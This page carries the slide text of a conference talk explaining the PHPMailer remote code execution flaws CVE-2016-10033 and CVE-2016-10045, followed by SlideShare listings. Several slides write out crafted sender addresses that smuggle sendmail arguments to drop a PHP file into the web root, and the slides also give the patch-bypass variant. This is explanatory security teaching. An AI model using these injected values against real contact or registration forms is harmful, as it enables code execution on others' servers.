SlideShare a Scribd company logo

PHP Mailer Remote Code Execution

Neelu Tripathy
Neelu Tripathy

This presentation is from a previous talk of mine at Null Mumbai. It explains PHP Mailer Remote Code Execution with regards to CVE-2016-10033 and a bypass to the initial patch i.e. CVE-2016-10045.

Technology
1 of 12
PHP MAILER REMOTE CODE EXECUTION CVE-2016-10033, CVE-2016-10045 NEELU TRIPATHY
PHP MAILER • Most Popular Code For Sending Email From PHP! • Used By Many Open-source Projects: Wordpress, Drupal, 1crm, Sugar CRM, Joomla! And Many More • Cve-2016-10033 • Affected Versions : < 5.2.18 • Exploit Variants Available In Bash, PHP & Python
Where To Look? • To Exploit The Vulnerability An Attacker Could Target Common Website Components Such As: • Contact/Feedback Forms, • Registration Forms, • Password Email Resets • And Others That Send Out Emails With The Help Of A Vulnerable Version Of ‘Phpmailer’ Class…
VULNERABLE CODE protected function mailsend($header, $body) { $toarr = array(); foreach ($this->to as $toaddr) { $toarr[] = $this->addrformat($toaddr); } $to = implode(', ', $toarr); $params = null; //this sets the smtp envelope sender which gets turned into a return-path header by the receiver if (!empty($this->sender)) { $params = sprintf('-f%s', $this->sender); } if ($this->sender != '' and !ini_get('safe_mode')) { $old_from = ini_get('sendmail_from'); ini_set('sendmail_from', $this->sender); } $result = false; if ($this->singleto and count($toarr) > 1) { foreach ($toarr as $toaddr) { $result = $this->mailpassthru($toaddr, $this- >subject, $body, $header, $params);
What’s Next • $Params = Sprintf('-f%s', $This->sender); //Function.Mail.Php • Public Function Setfrom($address, $Name = '', $Auto = True) // Sender Address Verification • RFC 3696 Specification: Allows Email To Contain Spaces “Attacker Crafted Command As Email”@fakeemail.Com $result = $this->mailpassthru($toaddr, $this- >subject, $body, $header, $params);
CRAFTING THE VECTOR "attacker -param2 -param3"@test.com • arg no. 0 == [/usr/sbin/sendmail] • arg no. 1 == [-t] • arg no. 2 == [-i] • arg no. 3 == [-fattacker -param2 - param3@test.com] "attacker " -param2 -param3"@test.com • arg no. 0 == [/usr/sbin/sendmail] • arg no. 1 == [-t] • arg no. 2 == [-i] • arg no. 3 == [-fattacker] • arg no. 4 == [-param2] • arg no. 5 == [-param3"@test.com]
FINAL SEND(ER) • $email_from = '"attacker" -oq/tmp/ - x/var/www/cache/phpcode.php some"@email.com'; • $msg_body = "<?php phpinfo(); ?>"; //can't use additional_parameters in safe_mode //@link http://php.net/manual/en/function.mail.php if (ini_get('safe_mode') or !$this- >usesendmailoptions or is_null($params)) { $result = @mail($to, $subject, $body, $header); } else { $result = @mail($to, $subject, $body, $header, $params); }
EXECUTION
DEMO RUN
CVE-2016-10045 PATCH Sanitize $Sender > Apply Escapeshellarg() : Escaping Before The Value Is Passed To Mail() escapeshellarg() escapeshellcmd() https://legalhackers.com/advisories/PHPMailer- Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln- Patch-Bypass.html
Phpmailer 5.2.18-19 • Extra Quote • Patched But Vulnerable: Phpmailer 5.2.18-19 • $Mail- >setfrom(""attacker' - Param2 -Param3"@test.Com", 'Client Name'); Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-f"Attacker] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com'] Modified Attacker Code
REFERENCES • https://github.com/PHPMailer/PHPMailer • https://legalhackers.com/advisories/phpmailer-exploit- remote-code-exec-cve-2016-10045-vuln-patch-bypass.html • https://www.exploit-db.com/exploits/40968/ • https://www.exploit-db.com/exploits/40969/ • https://github.com/opsxcq/exploit-cve-2016-10033 • https://legalhackers.com/advisories/phpmailer-exploit- remote-code-exec-cve-2016-10033-vuln.html THANK YOU!

Recommended

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
Mauricio Velazco
 
Security analytics for dummies Securonix special edition
Security analytics for dummies Securonix special editionSecurity analytics for dummies Securonix special edition
Security analytics for dummies Securonix special edition
Marusya Maruzhenko
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
Megan DeBlois
 
IT vs. OT: ICS Cyber Security in TSOs
IT vs. OT: ICS Cyber Security in TSOsIT vs. OT: ICS Cyber Security in TSOs
IT vs. OT: ICS Cyber Security in TSOs
Community Protection Forum
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
Prakashchand Suthar
 
Android Security
Android SecurityAndroid Security
Android Security
Lars Jacobs
 
Snort
SnortSnort
Snort
Michael Boman
 

Recommended

PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
Mauricio Velazco
 
Security analytics for dummies Securonix special edition
Security analytics for dummies Securonix special editionSecurity analytics for dummies Securonix special edition
Security analytics for dummies Securonix special edition
Marusya Maruzhenko
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
Megan DeBlois
 
IT vs. OT: ICS Cyber Security in TSOs
IT vs. OT: ICS Cyber Security in TSOsIT vs. OT: ICS Cyber Security in TSOs
IT vs. OT: ICS Cyber Security in TSOs
Community Protection Forum
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
Prakashchand Suthar
 
Android Security
Android SecurityAndroid Security
Android Security
Lars Jacobs
 
Snort
SnortSnort
Snort
Michael Boman
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
Michael Furman
 
Secure Code Warrior - XQuery injection
Secure Code Warrior - XQuery injectionSecure Code Warrior - XQuery injection
Secure Code Warrior - XQuery injection
Secure Code Warrior
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
Miroslav Stampar
 
Guide to MFA
Guide to MFAGuide to MFA
Guide to MFA
Jack Forbes
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
Michael Gough
 
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Anant Shrivastava
 
Application Security
Application SecurityApplication Security
Application Security
Reggie Niccolo Santos
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
David Sweigert
 
Android security
Android securityAndroid security
Android security
Mobile Rtpl
 
Deep Dive Into Android Security
Deep Dive Into Android SecurityDeep Dive Into Android Security
Deep Dive Into Android Security
Marakana Inc.
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!
 
Cybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practisesCybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practises
WAJAHAT IQBAL
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Have I Been Pwned and Cloudflare
Have I Been Pwned and CloudflareHave I Been Pwned and Cloudflare
Have I Been Pwned and Cloudflare
StefnJkullSigurarson1
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
NishaYadav177
 
Cybersecurity framework v1-1_presentation
Cybersecurity framework v1-1_presentationCybersecurity framework v1-1_presentation
Cybersecurity framework v1-1_presentation
Monchai Phaichitchan
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
Mohammed Adam
 
Multifactor Authentication
Multifactor AuthenticationMultifactor Authentication
Multifactor Authentication
Ronnie Isherwood
 
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDutyAWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
Chris Farris
 
Ch1(introduction to php)
Ch1(introduction to php)Ch1(introduction to php)
Ch1(introduction to php)
Chhom Karath
 
全裸でワンライナー(仮)
全裸でワンライナー(仮)全裸でワンライナー(仮)
全裸でワンライナー(仮)
Yoshihiro Sugi
 

More Related Content

What's hot

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
Michael Furman
 
Secure Code Warrior - XQuery injection
Secure Code Warrior - XQuery injectionSecure Code Warrior - XQuery injection
Secure Code Warrior - XQuery injection
Secure Code Warrior
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
Miroslav Stampar
 
Guide to MFA
Guide to MFAGuide to MFA
Guide to MFA
Jack Forbes
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
Michael Gough
 
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Anant Shrivastava
 
Application Security
Application SecurityApplication Security
Application Security
Reggie Niccolo Santos
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
David Sweigert
 
Android security
Android securityAndroid security
Android security
Mobile Rtpl
 
Deep Dive Into Android Security
Deep Dive Into Android SecurityDeep Dive Into Android Security
Deep Dive Into Android Security
Marakana Inc.
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!
 
Cybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practisesCybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practises
WAJAHAT IQBAL
 
Have I Been Pwned and Cloudflare
Have I Been Pwned and CloudflareHave I Been Pwned and Cloudflare
Have I Been Pwned and Cloudflare
StefnJkullSigurarson1
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
NishaYadav177
 
Cybersecurity framework v1-1_presentation
Cybersecurity framework v1-1_presentationCybersecurity framework v1-1_presentation
Cybersecurity framework v1-1_presentation
Monchai Phaichitchan
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
Mohammed Adam
 
Multifactor Authentication
Multifactor AuthenticationMultifactor Authentication
Multifactor Authentication
Ronnie Isherwood
 
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDutyAWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
Chris Farris
 

What's hot (20)

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Secure Code Warrior - XQuery injection
Secure Code Warrior - XQuery injectionSecure Code Warrior - XQuery injection
Secure Code Warrior - XQuery injection
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
 
Guide to MFA
Guide to MFAGuide to MFA
Guide to MFA
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
 
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
 
Application Security
Application SecurityApplication Security
Application Security
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
 
Android security
Android securityAndroid security
Android security
 
Deep Dive Into Android Security
Deep Dive Into Android SecurityDeep Dive Into Android Security
Deep Dive Into Android Security
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
 
Cybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practisesCybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practises
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Have I Been Pwned and Cloudflare
Have I Been Pwned and CloudflareHave I Been Pwned and Cloudflare
Have I Been Pwned and Cloudflare
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Cybersecurity framework v1-1_presentation
Cybersecurity framework v1-1_presentationCybersecurity framework v1-1_presentation
Cybersecurity framework v1-1_presentation
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
 
Multifactor Authentication
Multifactor AuthenticationMultifactor Authentication
Multifactor Authentication
 
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDutyAWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
AWS re:Inforce 2019 - Threat Hunting in CloudTrail & GuardDuty
 

Similar to PHP Mailer Remote Code Execution

Ch1(introduction to php)
Ch1(introduction to php)Ch1(introduction to php)
Ch1(introduction to php)
Chhom Karath
 
全裸でワンライナー(仮)
全裸でワンライナー(仮)全裸でワンライナー(仮)
全裸でワンライナー(仮)
Yoshihiro Sugi
 
Massive emailing with Linux, Postfix and Ruby on Rails
Massive emailing with Linux, Postfix and Ruby on RailsMassive emailing with Linux, Postfix and Ruby on Rails
Massive emailing with Linux, Postfix and Ruby on Rails
ibelmonte
 
php 2 Function creating, calling, PHP built-in function
php 2 Function creating, calling, PHP built-in functionphp 2 Function creating, calling, PHP built-in function
php 2 Function creating, calling, PHP built-in function
tumetr1
 
Sending E-mail that reaches the destination using PHP
Sending E-mail that reaches the destination using PHPSending E-mail that reaches the destination using PHP
Sending E-mail that reaches the destination using PHP
Manuel Lemos
 
Postman On Steroids
Postman On SteroidsPostman On Steroids
Postman On Steroids
Sara Tornincasa
 
Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008
Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008
Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008ClubHack
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyamiable_indian
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Hacking 101 for developers
Hacking 101 for developersHacking 101 for developers
Hacking 101 for developers
Tomer Zait
 
Let's begin resource monitoring with munin 2011 1209 zem_distribution
Let's begin resource monitoring with munin 2011 1209 zem_distributionLet's begin resource monitoring with munin 2011 1209 zem_distribution
Let's begin resource monitoring with munin 2011 1209 zem_distribution
Masahito Zembutsu
 
WordPress Cuztom Helper
WordPress Cuztom HelperWordPress Cuztom Helper
WordPress Cuztom Helper
slicejack
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Project
xsist10
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
Qpsmtpd
QpsmtpdQpsmtpd
Qpsmtpd
Fred Moyer
 
Dealing with Legacy Perl Code - Peter Scott
Dealing with Legacy Perl Code - Peter ScottDealing with Legacy Perl Code - Peter Scott
Dealing with Legacy Perl Code - Peter Scott
O'Reilly Media
 
Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)
Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)
Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)
James Titcumb
 
Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)
Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)
Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)
James Titcumb
 
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QACreating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QAarchwisp
 
QA for PHP projects
QA for PHP projectsQA for PHP projects
QA for PHP projects
Michelangelo van Dam
 

Similar to PHP Mailer Remote Code Execution (20)

Ch1(introduction to php)
Ch1(introduction to php)Ch1(introduction to php)
Ch1(introduction to php)
 
全裸でワンライナー(仮)
全裸でワンライナー(仮)全裸でワンライナー(仮)
全裸でワンライナー(仮)
 
Massive emailing with Linux, Postfix and Ruby on Rails
Massive emailing with Linux, Postfix and Ruby on RailsMassive emailing with Linux, Postfix and Ruby on Rails
Massive emailing with Linux, Postfix and Ruby on Rails
 
php 2 Function creating, calling, PHP built-in function
php 2 Function creating, calling, PHP built-in functionphp 2 Function creating, calling, PHP built-in function
php 2 Function creating, calling, PHP built-in function
 
Sending E-mail that reaches the destination using PHP
Sending E-mail that reaches the destination using PHPSending E-mail that reaches the destination using PHP
Sending E-mail that reaches the destination using PHP
 
Postman On Steroids
Postman On SteroidsPostman On Steroids
Postman On Steroids
 
Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008
Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008
Aseem - AntiSpam - Understanding the good, the bad and the ugly - ClubHack2008
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the ugly
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Hacking 101 for developers
Hacking 101 for developersHacking 101 for developers
Hacking 101 for developers
 
Let's begin resource monitoring with munin 2011 1209 zem_distribution
Let's begin resource monitoring with munin 2011 1209 zem_distributionLet's begin resource monitoring with munin 2011 1209 zem_distribution
Let's begin resource monitoring with munin 2011 1209 zem_distribution
 
WordPress Cuztom Helper
WordPress Cuztom HelperWordPress Cuztom Helper
WordPress Cuztom Helper
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Project
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
Qpsmtpd
QpsmtpdQpsmtpd
Qpsmtpd
 
Dealing with Legacy Perl Code - Peter Scott
Dealing with Legacy Perl Code - Peter ScottDealing with Legacy Perl Code - Peter Scott
Dealing with Legacy Perl Code - Peter Scott
 
Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)
Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)
Kicking off with Zend Expressive and Doctrine ORM (PHPNW2016)
 
Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)
Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)
Kicking off with Zend Expressive and Doctrine ORM (ZendCon 2016)
 
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QACreating "Secure" PHP Applications, Part 1, Explicit Code & QA
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
 
QA for PHP projects
QA for PHP projectsQA for PHP projects
QA for PHP projects
 

More from Neelu Tripathy

ContinuousSecurity, Beyond Automation.pdf
ContinuousSecurity, Beyond Automation.pdfContinuousSecurity, Beyond Automation.pdf
ContinuousSecurity, Beyond Automation.pdf
Neelu Tripathy
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
Neelu Tripathy
 
Mobile Security Risks & Mitigations
Mobile Security Risks & MitigationsMobile Security Risks & Mitigations
Mobile Security Risks & Mitigations
Neelu Tripathy
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
Neelu Tripathy
 
Burp Suite Extensions
Burp Suite ExtensionsBurp Suite Extensions
Burp Suite Extensions
Neelu Tripathy
 
Understanding Burp Replicator
Understanding Burp ReplicatorUnderstanding Burp Replicator
Understanding Burp Replicator
Neelu Tripathy
 
Social Engineering Techniques
Social Engineering TechniquesSocial Engineering Techniques
Social Engineering Techniques
Neelu Tripathy
 

More from Neelu Tripathy (7)

ContinuousSecurity, Beyond Automation.pdf
ContinuousSecurity, Beyond Automation.pdfContinuousSecurity, Beyond Automation.pdf
ContinuousSecurity, Beyond Automation.pdf
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
 
Mobile Security Risks & Mitigations
Mobile Security Risks & MitigationsMobile Security Risks & Mitigations
Mobile Security Risks & Mitigations
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
 
Burp Suite Extensions
Burp Suite ExtensionsBurp Suite Extensions
Burp Suite Extensions
 
Understanding Burp Replicator
Understanding Burp ReplicatorUnderstanding Burp Replicator
Understanding Burp Replicator
 
Social Engineering Techniques
Social Engineering TechniquesSocial Engineering Techniques
Social Engineering Techniques
 

Recently uploaded

Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
ViralQR
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 

Recently uploaded (20)

Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
